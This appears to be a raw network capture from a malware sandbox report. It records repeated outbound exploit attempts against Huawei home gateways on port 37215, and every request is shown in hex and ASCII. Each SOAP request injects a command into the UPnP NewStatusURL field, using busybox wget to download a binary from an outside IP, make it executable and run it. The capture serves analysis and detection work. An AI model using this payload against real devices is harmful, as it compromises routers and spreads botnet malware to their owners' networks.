                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2361192.168.2.154375841.252.50.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808094978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2362192.168.2.155050241.90.132.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808119059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2363192.168.2.154439241.32.210.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808140039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2364192.168.2.155265441.249.83.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808161020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2365192.168.2.153865641.198.72.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808195114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2366192.168.2.153595641.235.236.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808222055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2367192.168.2.155267241.59.250.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808233976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2368192.168.2.154074641.231.80.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808526039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2369192.168.2.154936441.241.88.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808557987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2370192.168.2.153388841.92.169.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808579922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 